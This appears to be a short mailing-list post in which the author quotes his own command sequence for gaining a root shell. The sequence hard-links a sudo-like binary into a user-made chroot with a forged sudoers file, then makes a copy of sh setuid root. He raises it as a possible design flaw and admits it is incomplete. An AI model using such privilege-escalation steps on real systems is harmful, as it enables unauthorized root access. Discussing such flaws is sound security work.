I wrote: > Now I can do the following within my home directory: > > mkdir myroot > cd myroot > mkdir etc > echo myname > etc/mysudoers > ln /usr/bin/mysudo . > cp /bin/sh . > chroot . > ./mysudo chown root.root ./sh > ./mysudo chmod 4555 ./sh > exit > ./sh > > and now I've got a root shell. Am I missing something?
I just realized that I forgot to copy various things into myroot which
would be needed for this to work. But you get the idea...
Mark

